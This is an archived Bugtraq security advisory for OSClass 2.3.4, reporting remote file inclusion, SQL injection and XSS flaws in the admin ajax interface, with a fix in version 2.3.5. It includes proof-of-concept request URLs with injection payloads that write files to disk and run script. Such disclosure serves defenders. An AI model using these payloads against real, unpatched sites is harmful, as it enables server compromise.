| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 30 Jan 2012 13:31:58 +0100 From: Filippo Cavallarin <filippo.cavallarin@...seq.it> To: bugtraq@...urityfocus.com Subject: Multiple vulnerabilities in OSClass Advisory ID: CSA-12003 Title: Multiple vulnerabilities in OSClass Product: OSClass Version: 2.3.4 and probably prior Vendor: osclass.org Vulnerability type: SQL injection, XSS, Remote file inclusion Vendor notification: 2012-01-12 Public disclosure: 2012-01-27 OSClass version 2.3.4 and probably below suffers from multiple vulnerabilities: 1) Remote file inclusion in osc_downloadFile(). This vuln allows an attacker to put an arbitrary file (ie a melicious php script) on the server under the www root so it's possible to execute shell commands with the previleges of the webserver An attacker must be logged as admin to exploit this vulnerability. http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php http://127.0.0.1/osclass/oc-content/downloads/tmp.php 2) SQL injection in admin's ajax interface when performing the "edit_category_post" action. The GET parameted id is not sanitized. An attacker must be logged as admin to exploit this vulnerability; gpc_magic_quotes must be off http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US%23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201 3) SQL injection in admin's ajax interface when performing the "enable_category" action. The GET parameted id is not sanitized. An attacker must be logged as admin to exploit this vulnerability. http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201 (id must be a valid subcategory id - in this case gpc_magic_quotes can be on) 4) XSS in admin's' ajax interface. The GET parameted id is not sanitized. An attacker must be logged as admin to exploit this vulnerability. http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E (id must be a valid category id) Solution upgrade to OSClass 2.3.5 http://osclass.org/2012/01/16/osclass-2-3-5/ Filippo Cavallarin C o d S e q Development with an eye on security ------------------------------------------------------------------------ Castello 2005, 30122 Venezia Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254 c.f. CVLFPP82B27L736J - p.iva 03737650279 http://www.codseq.it - filippo.cavallarin@...seq.it
Powered by blists - more mailing lists